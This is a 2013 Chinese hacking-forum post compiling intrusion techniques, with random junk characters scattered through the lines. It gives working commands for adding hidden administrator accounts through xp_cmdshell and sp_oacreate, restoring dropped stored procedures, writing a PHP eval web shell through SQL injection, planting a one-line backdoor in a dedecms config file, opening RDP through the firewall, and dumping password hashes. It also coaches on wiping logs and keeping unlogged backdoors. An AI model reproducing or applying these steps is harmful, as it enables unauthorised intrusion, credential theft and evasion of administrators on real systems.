中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]
作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全

, c! p6 r3 A! O# \' F3 A1.net user administrator /passwordreq:no  p0 n/ c' u& F
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
* o4 k1 p7 x, f$ s4 Z& q* f2.比较巧妙的建克隆号的步骤
9 |8 l) @, w' j' z" f先建一个user的用户
5 Q' }7 P' O; R( P% t7 G然后导出注册表。然后在计算机管理里删掉
6 ~" Z4 e1 a% b  {0 r在导入,在添加为管理员组
, c! h! \& |. Y, E' P# U3.查radmin密码. C3 L5 B. ^  }7 b
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
! [7 L. @& j: i8 l' f4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]9 _7 y# x$ @6 Q8 @4 d) X
建立一个"services.exe"的项
4 E) A! U3 k- r* @8 W/ |再在其下面建立(字符串值)2 D' @+ d0 |! ^, ]& b- V
键值为mu ma的全路径
5 e8 x9 W3 g& T' X, U7 [) g) r5.runas /user:guest cmd
* }* T+ b, h$ ^5 ]+ z* a, N测试用户权限!9 A2 l; _& o$ s8 M3 _) `
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?! H# B% y7 G, p, H
7.入侵后漏洞修补、痕迹清理,后门置放:" \$ p2 \" A& f6 w7 d
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门1 G1 C9 |2 m3 I% G" ~4 e
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c5 f# o. X/ _4 \

$ O7 S6 R& r( i+ u0 ~' Kfor example
* ~3 H% `: j  M5 b2 z3 W; H1 n7 k8 p% j
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'; Q9 W& Z% E3 e( C' g, [
/ d3 U; e- w7 i& `+ s7 L
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add') x2 v, P: n8 d9 z
. P- |- b1 ~- g: \) b$ @) R& E* w
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了# C" m0 Z  s5 |
如果要启用的话就必须把他加到高级用户模式
9 l5 m6 i6 p" j% k; `, a1 S, }可以直接在注入点那里直接注入
( C7 V, S$ c& m; [+ O7 uid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--$ [+ z$ R! }. h. U6 |* o' c
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--% t4 O! u, W- u
或者
' N6 o( K0 ^" K; ]. _9 x+ Csp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
0 i( S+ G! g2 R- s: R来恢复cmdshell。
/ k8 m1 v/ w9 q
% w* @/ `# A& l* k5 [5 ~& ?分析器9 @( A* S, X1 s! A
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
% V2 ?( ]9 A8 p$ ]" e然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")# F  s2 P4 x0 `! W) B
10.xp_cmdshell新的恢复办法
; b- Y: D, z: g$ p6 }6 Zxp_cmdshell新的恢复办法5 w% ^* r3 K- V5 Y4 @+ h+ ^
扩展储存过程被删除以后可以有很简单的办法恢复:
8 K( M# n2 }; }+ l删除
: ^3 X0 ^2 J; M+ P# l/ Q/ m  Idrop procedure sp_addextendedproc  W+ S' z( R4 S5 c! e( M' K
drop procedure sp_oacreate9 y6 F( K/ l0 \1 \0 Y7 M$ p
exec sp_dropextendedproc 'xp_cmdshell'
1 q' w( }8 \! h4 E: A/ E
" \, S# R! y: U7 T! I4 X, a4 g, z5 s恢复
* a  U8 C. s$ @, ^, _5 {8 Sdbcc addextendedproc ("sp_oacreate","odsole70.dll")
& h4 {, h. [" Ndbcc addextendedproc ("xp_cmdshell","xplog70.dll")# Y) q. r; O, F
5 h! e( y# q8 u
这样可以直接恢复,不用去管sp_addextendedproc是不是存在7 Z* R3 ^2 \) ?& |5 _( W0 p; _
6 w* `2 N+ t0 W0 k3 g. e+ K9 P+ w
-----------------------------9 L) ^, G3 t- u2 ^; g2 G

" x* o& q, b; F8 c2 `删除扩展存储过过程xp_cmdshell的语句:
) g: l5 {# e* Z" E8 q; bexec sp_dropextendedproc 'xp_cmdshell'6 C( k' F; N! H# x  }
" f6 z2 g7 o! J  Z4 y& ]1 `; F* Z5 y! Y
恢复cmdshell的sql语句
6 N$ b0 `7 p; y2 lexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'0 W6 r. ^: \1 T8 k1 T8 R7 G7 q1 D7 r

" l) W( D. z( C4 p2 S& b1 Q4 v4 z# s- O3 D& `3 h; }: [
开启cmdshell的sql语句
3 x6 ?! p/ O3 x0 l5 f" @( |; _4 f5 Y0 p
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
3 q# l" q$ |4 G# G; G" ]
$ v4 b3 r( c2 S/ G% u1 ?9 t5 ?判断存储扩展是否存在
+ S  ~+ x0 B) l- z$ Pselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
6 v8 `6 N! `( ~返回结果为1就ok$ v8 L8 b: h  I/ ~
6 @7 b6 m( {3 u+ w
恢复xp_cmdshell
9 J3 \7 u5 {0 k+ }. G/ ~5 y- hexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
) U3 X, _' U/ s4 T6 @返回结果为1就ok1 y3 t7 W8 l$ {4 ?# R+ M+ ]

. E) A! ]0 z5 R5 }* w否则上传xplog7.0.dll7 l7 w2 [+ s9 @1 X% i/ c
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
& ?, R/ @# ~$ u  i. T
+ a( j  I  K9 u! s5 n; @- a堵上cmdshell的sql语句
: J1 J: Q0 F3 U* J2 n4 Esp_dropextendedproc "xp_cmdshel& A; z6 J& M! p  Y3 ~
-------------------------
' Z8 _/ B) [8 c, s' i9 Q& l清除3389的登录记录用一条系统自带的命令:) a' U% l. s) m7 Q$ z4 j& V
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
6 b; f/ R' E& i& N, Y1 h
; ~4 P& r% O# ^+ |6 k: m. z然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件8 y$ E$ Y( B) M
在 mysql里查看当前用户的权限
/ _, S% d8 {* Y# ?9 Ushow grants for  6 ^% Z7 I2 h- L, T8 v" c" l( A

9 u0 h8 w- M; \以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
8 {) [! m7 v, D# k" L
; J) Q3 C+ c, W3 u0 k2 X3 b8 `
6 l0 A* O* ]2 P; G0 p5 M( LCreate USER 'itpro'@'%' IDENTIFIED BY '123';3 g/ c; C6 I& y! F2 r/ Z8 k
- `3 J7 B- I" d5 H4 z; L
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
  g  B: u$ I4 j; k9 y: R6 g6 a6 _/ Z. o
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
! b7 d; v, F' r) L  e& V. P6 ~2 K6 {( e
6 ~& S' c8 D8 T8 c9 K. K4 b7 z" HMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
4 y+ l$ P9 L* ]% V
& @+ X8 }& d) }. J搞完事记得删除脚印哟。
# H2 s" H7 W( Q* u8 H
: d7 @% F9 P2 B1 V5 i8 S& W% E- gDrop USER 'itpro'@'%';+ [: I" n  J- ?' x

8 |: L+ q7 r$ U& l- N- P( x% fDrop DATABASE IF EXISTS `itpro` ;3 Q" K! S* e$ Q: Z
( n/ @5 S( h* |% s" ~
当前用户获取system权限
* b$ ?6 N' S- x6 X0 V; u- ?sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
5 O. K" f6 R/ a; O1 ssc start SuperCMD' d( V9 C3 g6 r) V) N
程序代码: N- E" M& p$ U9 W
<SCRIPT LANGUAGE="VBScript">
7 ?3 R* _8 @: zset wsnetwork=CreateObject("WSCRIPT.NETWORK")5 p( X- t) ?* ~! c
os="WinNT://"&wsnetwork.ComputerName
1 ]% R! c, j: a% t# p% XSet ob=GetObject(os)8 ?" @: ^& |& L! x) Q* i/ f
Set oe=GetObject(os&"/Administrators,group")1 k- b. p4 j% |3 R3 i
Set od=ob.Create("user","nosec")
& e% d# C$ U$ A6 v+ e/ e4 G+ j" G5 Bod.SetPassword "123456abc!@#"( p4 U2 L; I3 X; Q) K" q) a
od.SetInfo
" G' C4 d4 q" J7 h8 f$ USet of=GetObject(os&"/nosec",user)- y/ i6 w) d- y+ U) i- `1 G
oe.add os&"/nosec"
* W+ g7 j8 d) D$ }$ P</Script>2 p$ o( g' D/ L6 l. L
<script language=javascript>window.close();</script># ]9 x0 i* H  U0 B/ r; H  Z
$ s+ l5 r' O4 ^  m
, M, c% N  ]+ d# T1 K  ~2 \

3 y1 ~" n: i* V3 D5 V' e" Y5 ?3 r& h6 [2 e5 M
突破验证码限制入后台拿shell
) D  \' A/ V( L# i+ Q; E% N: C程序代码& e/ F9 U3 _8 y) w: s1 {+ G
REGEDIT4 / M' U& b' A3 h/ @  y6 r
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
7 }, K4 W1 e7 J! e, l"BlockXBM"=dword:00000000
7 h! A' v$ L+ h) h5 f7 n( l! \! M! Q# j( u4 ~8 q; r9 \- F
保存为code.reg,导入注册表,重器IE' z' }: m. D) M9 j$ y
就可以了$ }( s" O3 y) M! K% R) V" i' w
union写马
5 e) T: q/ _2 V- h  P; T& d程序代码0 \( _& r; l: ?: b" F  L
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
4 e  o7 [8 d  P  ]. {& [1 G, ~* t7 L* [, i1 a8 ~
应用在dedecms注射漏洞上,无后台写马$ N, u& |8 y$ N/ A& l0 A
dedecms后台,无文件管理器,没有outfile权限的时候
& Y, r( r: D( W0 g8 q. L) S6 F% o在插件管理-病毒扫描里# f) p$ K' f* L+ b5 S
写一句话进include/config_hand.php里
$ n2 N; c7 n* ]( n$ k% h程序代码3 w" L5 F' V, V' ?
>';?><?php @eval($_POST[cmd]);?>
% p$ X; m8 o( s" T$ m6 u0 n. C9 ]* w; _
9 }: Y, X. n# k
如上格式
! U/ H3 B7 i# [" H( t
; j' Z6 K7 B2 b. woracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
1 L% D& d: R1 O8 Q程序代码( F; O0 N, W7 @% d
select username,password from dba_users;
7 C5 w: Q, m. c& \& s. H. R# C6 j2 w( E% Y# d: R

. @+ M' p, u) U' Y+ fmysql远程连接用户
& h$ X1 |. Y; ~5 J程序代码
/ D$ F6 }3 W! i$ I' |# T% @/ H
2 v0 A, |7 S" {9 V: f" mCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';# U) F; |/ @9 h
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
) n0 W: q& C+ E; S$ V3 J8 i" sMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
1 U6 }/ b; |% g5 K6 k: _MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
2 A9 d  I9 }7 B, p% l# a" Z- q" _1 F; J6 w- n- G
4 K7 o% D4 o; i" w# x8 G! r
. ~$ f; [" l% ~% W! P

" B: ^% X$ s3 }/ c# |  T6 T& {echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
9 x( x1 b& r1 v/ d0 l  T& B7 G4 \" [# T0 N: p6 u' s
1.查询终端端口* A# _. J, ^1 Q1 s4 p: s! B- b

6 o6 f3 y2 ]4 k, r" Zxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
" L8 s! T5 _; W5 @" B7 U6 @5 A, z- J5 ^3 S- }6 {( |) g1 w( L
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"% D3 Z' d( x" a* [/ J) x
type tsp.reg) X/ s! e( L: Y8 m' I: W

+ |1 h. c3 n5 B2.开启XP&2003终端服务' f9 G' F* n. U* h7 m

8 t, a! s7 L0 q; u/ m/ r' c. l* U. E. j! _3 S0 ^- Z) s
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
+ k8 d) P+ k& K' {' R0 W
6 B3 g0 z3 ~' }1 R5 W, W4 v: y, H2 X$ p: @
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
, m3 u7 z: c* t" F$ k$ M7 _* u
: U0 v7 S: L5 O3.更改终端端口为20008(0x4E28)
. u( o6 x2 l- S5 D4 E
/ V8 r1 K& e" O( s8 |) {REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f: J! n! R2 d$ |9 x

1 w3 P; h$ J1 b6 `  i. gREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
* K+ w3 {- k- [2 i3 @+ {; g" D4 R% w8 F/ D: _& ~1 s! ~
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
. S# X+ |4 o3 H- f9 H6 Z' l0 q% t9 i3 e5 j2 d
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
( D# K$ W' U/ o2 X" C6 W5 y! S( Y$ W2 J" |- v/ L5 U: w+ C
) A5 B: Z( J1 D
5.开启Win2000的终端,端口为3389(需重启)$ Z  N  ?. i6 o, t0 y9 {% a
0 u! N1 \& P3 k7 Q; s8 z  ?
echo Windows Registry Editor Version 5.00 >2000.reg
' h$ ^! [# T' x# P; \4 qecho. >>2000.reg
* {# A) C$ l0 T4 |7 g5 c4 j4 g$ hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
; \& z) C6 j/ x3 |* R3 Mecho "Enabled"="0" >>2000.reg ) B& }9 k* O5 [' ?
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
( u( T* e* u& ?* _! Fecho "ShutdownWithoutLogon"="0" >>2000.reg / v0 D0 h) E: l- \1 b% C+ z. y; G
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 5 m8 K0 E3 {2 q  ?+ m: q% M2 y
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg . Y' A; c- K6 L6 g; d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
, b, J+ ?2 G3 B2 v' A) n1 [, K+ Recho "TSEnabled"=dword:00000001 >>2000.reg
2 X/ I/ N6 f$ ~4 b4 F7 I: \: ~2 {4 h* Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
2 g3 c5 Y- @! lecho "Start"=dword:00000002 >>2000.reg
" Q: ~& h/ C/ ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
+ \  e) ?$ m2 l9 V) ^echo "Start"=dword:00000002 >>2000.reg
# F6 Q# `& K+ t1 H6 L1 Pecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
: ~" W( Q4 G8 H( m1 o1 ?0 R+ k- N; Gecho "Hotkey"="1" >>2000.reg ! w( m, O% |+ t+ @' R2 j
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg ! _8 s2 V) t2 U5 H& d; C# I
echo "ortNumber"=dword:00000D3D >>2000.reg 5 {% x% j$ ?4 A0 r, C  _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg . R& Y- H- m8 a3 _# {
echo "ortNumber"=dword:00000D3D >>2000.reg
1 y1 D9 [5 \/ S9 |+ `2 H* Z4 T- s3 n8 j4 ^' p
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
9 a1 u6 V5 Y8 F7 ^& R  A" W* z2 b4 n. m" [$ t
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf6 D* ~+ S% P7 f* W8 R
(set inf=InstallHinfSection DefaultInstall)+ y9 r  q- _" C: x9 w
echo signature=$chicago$ >> restart.inf$ |* L  s0 u8 G. {! S
echo [defaultinstall] >> restart.inf
; m. v4 F7 u- T$ M! hrundll32 setupapi,%inf% 1 %temp%\restart.inf
; z) n: w* G( }2 J3 A$ b9 K0 w
& y0 A$ Z7 e8 F. T' q# Y
7 m, c; b+ j$ {  n# `2 o: i% ^% w7.禁用TCP/IP端口筛选 (需重启)
- {) ]) Y4 ]; ~1 l, ]& h; f
$ l1 N1 G' U/ U3 G8 oREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
, r( \7 a) w6 |& d) o' F, d1 r  @. s+ z
8.终端超出最大连接数时可用下面的命令来连接
9 G" o8 @  S) d$ O4 F9 `
: I; x& [4 Y- e5 {: Imstsc /v:ip:3389 /console7 d1 m( N) ^* \

6 P( B( ^8 q* N/ K7 R$ e5 V9.调整NTFS分区权限
  ?% [  W0 ]# S: p! o8 p+ L4 v
# P9 j' p# m2 X8 Y9 @2 Acacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
+ Q: q7 J+ K6 G% ]# S' r; o
" i6 P; `+ F* bcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
8 d5 y1 e0 Q7 I. [4 M; i, r3 b' a7 p& P, L' Y
------------------------------------------------------
+ `, y$ k4 R( X3389.vbs 7 `) g; i$ e- I9 v
On Error Resume Next2 Z2 b% K- w) v. w$ j) w% G
const HKEY_LOCAL_MACHINE = &H800000026 C( d: w5 G3 h
strComputer = "."
) _* G+ C" [1 r; X! b1 PSet StdOut = WScript.StdOut% [- n7 n* s( E4 |, ?6 y: |% l* j
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
, S: @9 C& z6 i9 m) |0 r  pstrComputer & "\root\default:StdRegProv")" H2 l9 e0 S0 L0 v2 A+ l5 f
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
" U1 U4 x$ G! \+ k' i5 \) v: h& K) g# poreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath( ~, o2 a9 S  w( Z9 Y# O  Z; {+ _
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
6 H# y+ G- c7 H! Foreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
2 I' c8 l# u, ~6 B0 xstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
% |& e! X5 V) ?; \6 M. d5 TstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
3 ^  m: r" }. {$ G, S% zstrValueName = "fDenyTSConnections"
# P" }1 z9 s' P4 X! hdwValue = 06 Y. ^/ ^9 m+ i% [5 j7 I
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue) {1 G7 h& x; c2 j& O) R
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"4 |* U" t8 y. V
strValueName = "ortNumber"
: `* a$ K- }+ H; G8 g* VdwValue = 33892 c' w7 }7 C9 T" E* V
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
0 e2 K/ |8 P  {; b/ xstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"& w' O0 c- V) _1 O$ Y" k* L
strValueName = "ortNumber"
* v. Y% R" |: U0 o" N; F& m5 N" xdwValue = 3389+ ]7 x( Z0 P$ o  {! `
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
- |! K8 |8 g) s  e3 h$ s" r/ A6 NSet R = CreateObject("WScript.Shell") 5 p4 v* j8 a* c7 V
R.run("Shutdown.exe -f -r -t 0") + G1 q9 d7 b4 U. h

+ e) q& }$ r) U% p删除awgina.dll的注册表键值: D* r$ ~$ h! Q0 u+ Y! I
程序代码  s5 A; l7 B2 `, E; B4 Y
2 n8 ^9 h5 v* I, O' N5 @
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
' L0 S* V9 E8 ~4 W* g) p+ S( v6 I9 t4 ?+ ~7 g

- R/ x2 F6 v6 ]( S' d) ~" W5 |+ E. V
/ L9 L9 r# J: W( i0 \
程序代码- p1 z8 `: s4 W, h! f
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash& t8 ]$ l- f8 c: Y- z2 U9 H

8 y" }3 U0 {' }" ^8 ]% q! l' b0 ~# T设置为1,关闭LM Hash
- {# e, `& F7 v& f! A4 ]# s7 Y
3 u  l' @. F6 B数据库安全:入侵Oracle数据库常用操作命令" K" q% h% a8 |9 n  R) `
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
, w6 |! F6 y% B5 S7 i+ g1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
8 n" D* h3 Z0 W8 v2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;& w6 k; ~5 c: Q
3、SQL>connect / as sysdba ;(as sysoper)或* f) f: @5 ?! X5 B% A
connect internal/oracle AS SYSDBA ;(scott/tiger)
& S+ l0 V; v$ _: i( Zconn sys/change_on_install as sysdba;
6 Z0 v& K; _- y; j4 H& K2 h" w1 N4、SQL>startup; 启动数据库实例
+ P( k0 j- g* s, o5、查看当前的所有数据库: select * from v$database;8 d& T, n5 |" v1 a
select name from v$database;6 s6 K- L: C) E* H
6、desc v$databases; 查看数据库结构字段
$ {9 ^. x- u" A+ k, K3 }4 e7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
1 e& J; J( P5 ]0 S- R5 aSQL>select * from V_$PWFILE_USERS;
& }$ _/ m4 G% m: A4 aShow user;查看当前数据库连接用户- o" p5 J- t7 B/ x0 [/ v  t
8、进入test数据库:database test;4 l' L( U) s# I0 \) U" P
9、查看所有的数据库实例:select * from v$instance;
$ ?/ _& Y& f. E) \* K. G7 D8 Z, {如:ora9i
; W) g0 l' U6 M& \10、查看当前库的所有数据表:
3 n1 A5 \5 k0 h* `+ j% cSQL> select TABLE_NAME from all_tables;
! U5 K8 R, [3 ^select * from all_tables;9 L# n7 G, Z- e* p9 e, b
SQL> select table_name from all_tables where table_name like '%u%';# R* `( I0 Q- ~) z
TABLE_NAME2 s# N% E7 P* C) u* W
------------------------------8 H7 T/ y+ t' u# I( O4 h
_default_auditing_options_" p2 B. u2 s. t5 M" v; u
11、查看表结构:desc all_tables;( b& A, @/ @2 Q. F
12、显示CQI.T_BBS_XUSER的所有字段结构:$ X* w& x# p+ n6 a! ~& s
desc CQI.T_BBS_XUSER;. E2 b6 _; ~- F3 I7 o; _! q
13、获得CQI.T_BBS_XUSER表中的记录:( h0 b! b$ |7 z0 S: k# c2 j
select * from CQI.T_BBS_XUSER;- ?. X) i* i( l5 q9 l1 \
14、增加数据库用户:(test11/test)
; O4 K0 K& v( u/ b1 T3 M# ncreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;5 x" S4 e2 ]' M, G5 r
15、用户授权:' S6 ?- s/ s' M1 d$ Y# {$ E7 N6 P
grant connect,resource,dba to test11;
& s5 w" |4 f5 v0 ^8 Y2 x4 Ngrant sysdba to test11;
1 Z# q) K/ x* i7 M; l" _commit;
1 n% G- k5 T, J3 O, t8 n7 K16、更改数据库用户的密码:(将sys与system的密码改为test.)
7 L! I5 ^  F3 z% ~4 Falter user sys indentified by test;) t1 ]2 j0 g) _
alter user system indentified by test;
) |' ~4 [6 l9 d0 j8 t) I
9 q6 V7 X. S: f% M7 K4 j, K/ KapplicationContext-util.xml
! U: k. d) U2 M" ~3 NapplicationContext.xml# B2 S8 [- p8 s# I2 ]4 n5 l1 @; W
struts-config.xml. _4 k; F, y) V. D/ W
web.xml$ Z) B0 S: c  [3 ^# W8 D
server.xml0 ?! F! o3 A6 n; K" i
tomcat-users.xml
" H) r) i. d7 q" K; Ehibernate.cfg.xml
. F/ u, R8 w  ]# w, hdatabase_pool_config.xml% Q$ R$ ^/ y: b/ P
9 M8 T2 J! \) J: e' |6 B. U9 k
; R1 v( ?9 Z+ N/ L( h
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置: i9 ?8 A8 l+ _3 A; \
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
$ p2 ~) L& D! S! ^6 H\WEB-INF\struts-config.xml  文件目录结构
1 j4 H+ M1 F0 z$ e3 u5 Z" g0 |* A- k9 q, L% ~
spring.properties 里边包含hibernate.cfg.xml的名称
+ v$ T" A" l- }# v; s+ s$ \; r# M! I: T) E  B8 S; V

  y6 G& D  z0 eC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml. O, \% U. l1 W0 F% i
/ v- M/ z1 [! V/ U2 p, C+ f
如果都找不到  那就看看class文件吧。。
  x+ ^% u8 }1 G  @: I6 @* x! [0 s8 W# f4 A0 J
测试1:
5 ?" F) }  c8 ~( L6 `SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
$ q& O$ K  E$ H8 z( d# f1 C" J* z; m2 T0 t& v
测试2:
8 x% Q- W  _5 }( m4 \' x
, a! ~0 q8 z% l+ Y3 Ccreate table dirs(paths varchar(100),paths1 varchar(100), id int)6 w! V7 b! `* y) h
! Y/ F' ?3 M( n
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
- P2 |% i. t* a4 ]. X& E/ r' q& P9 u1 c9 L. [9 f
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
" \, F$ }$ Q3 }- x9 p9 W8 j
7 j. c0 i: a) h% v8 q1 e查看虚拟机中的共享文件:( W4 Q7 w. Q  e5 H6 P" h% n; Q
在虚拟机中的cmd中执行
- B& e/ `- p3 S0 ]/ _\\.host\Shared Folders
2 j# n# y; [: L1 x- [* w
, F, p' ~$ H4 I8 b* i+ b  p& E& zcmdshell下找终端的技巧
0 I- `  c: N8 _5 H找终端:
$ A" H2 [* h9 h+ Y% V第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
7 P# ~, j9 p. J1 R9 k: z( _   而终端所对应的服务名为:TermService
8 E8 M: k; @% y2 s) S1 U: L& J4 U第二步:用netstat -ano命令,列出所有端口对应的PID值!
2 q: i! K; h7 s/ i   找到PID值所对应的端口
* I: E. a7 ~4 @6 t  G* |, Q) T
: u  y4 N( b- R, E查询sql server 2005中的密码hash. T' {5 O3 `" @) p5 R. e
SELECT password_hash FROM sys.sql_logins where name='sa'
